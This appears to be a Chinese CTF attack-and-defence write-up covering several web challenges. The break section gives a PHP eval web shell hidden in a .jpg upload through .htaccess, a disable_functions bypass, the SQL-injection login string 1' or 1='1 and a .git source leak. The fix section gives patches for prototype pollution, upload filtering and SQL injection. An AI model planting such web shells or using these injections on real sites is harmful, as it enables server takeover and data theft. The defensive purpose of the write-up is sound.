BREAK
simple_upload
抓个包改包
上传失败。
apache服务想到.htaccess修改头。然后jpg里放马。
上传马1.jpg
<?php eval($_POST("cmd"))?>
蚁剑连接,使用插件绕过disable_function,调用/readflag,得到flag。
baselogic
看请求头发现给了一个cookie。
访问dwdwgadag.html,可以登录到aaa账户。
猜测有sql注入,尝试万能密码1' or 1='1
得到flag。
welcome
F12。
leakleak
访问发现源代码F12看到提示.git。
git源码泄露,通过githack还原。历史版本,
得到find_me.php。无字符eval。
FIX
CyberHunter
过滤 __proto__
、constructor
、"prototype" 等关键词,防止原型链污染
function cleanObject(obj) { for (const prop in obj) { if (prop === '__proto__' || prop === 'constructor' || prop === 'prototype') { delete obj[prop]; } else if (typeof obj[prop] === 'object') { cleanObject(obj[prop]); } } } function parseObject(str) { let obj = JSON.parse(str); cleanObject(obj); return obj; } cleanObject(req.body) const { username, password } = req.body let user = { username: parseObject(username), password: parseObject(password), auth: "GenshinImpact" }
simple_upload
修改黑名单为白名单
if(!preg_match("/jpg|jpeg|png|gif/"))
leakleak
删除 backdoor 和 .git 泄露
baselogic
修复 sql 注入漏洞
$checkEmailSql = $conn->prepare("SELECT * FROM users WHERE username=?"); $checkEmailSql->bind_param("s", $username); $checkEmailSql->execute(); $checkResult = $checkEmailSql->get_result(); $insertTokenSql = $conn->prepare("REPLACE INTO password_reset_tokens (username, token) VALUES (?, ?)"); $insertTokenSql->bind_param("ss", $username, $token); $insertTokenSql->execute(); $sql = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?"); $sql->bind_param("ss", $username, $password); $sql->execute(); $result = $sql->get_result(); $checkTokenSql = $conn->prepare("SELECT * FROM password_reset_tokens WHERE token=? AND username=?"); $checkTokenSql->bind_param("ss", $token, $user); $checkTokenSql->execute(); $checkResult = $checkTokenSql->get_result(); $updatePasswordSql = $conn->prepare("UPDATE users SET password=? WHERE username=?"); $updatePasswordSql->bind_param("ss", $newPassword, $user); $updatePasswordSql->execute(); $deleteTokenSql = $conn->prepare("DELETE FROM password_reset_tokens WHERE token=?"); $deleteTokenSql->bind_param("s", $token); $deleteTokenSql->execute();
修复逻辑漏洞
$token = base64_encode(bin2hex(random_bytes(5)));